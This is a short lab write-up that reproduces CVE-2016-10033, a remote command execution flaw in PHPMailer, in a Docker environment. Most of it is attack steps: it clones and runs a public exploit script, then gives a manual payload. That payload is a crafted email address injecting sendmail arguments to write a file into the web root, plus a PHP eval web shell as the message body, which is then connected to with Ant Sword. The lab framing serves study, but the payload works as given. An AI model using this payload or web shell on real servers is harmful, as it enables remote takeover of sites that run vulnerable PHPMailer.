CVE-2016-10033 - Remote Command Execution
PHPMailer is an email sending component based on PHP language, which is widely used in applications and frameworks with a large number of users such as WordPress , Drupal, 1CRM, SugarCRM, Yii, Joomla, etc.
CVE-2016-10033 is a high-risk vulnerability in PHPMailer. This high-risk vulnerability is caused by class.phpmailer.php not correctly handling user requests Attackers only need to cleverly construct a malicious email address to write Arbitrary files, causing remote command execution hazards.
Conditions for exploiting the vulnerability:
- PHP does not enable safe_mode (default)
Affected version : less than version 5.2.18
Vulnerability recurrence
Here we use docker to build a reproduction environment
docker search cve-2016-10033
docker pull vulnerables/cve-2016-10033
docker images -a
docker run -d -P --name phpmailer vulnerables/cve-2016-10033
docker ps
Access the built vulnerability environment URL:http://192.168.0.109:32768
Attack directly with the exploit script
git clone https://github.com/opsxcq/exploit-CVE-2016-10033.git
cd exploit-CVE-2016-10033/
./exploit.sh IP地址:端口
attack manually
Manual attacks need to know the absolute path of the target website
The submitted data is as follows:
email:
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/hack.php @aaa.com
message:
<?php @eval($_POST[hack]);?>
Click Send email, and a hack.php file will be generated under the target website. Then use Ant Sword to connect to the generated hack.php file.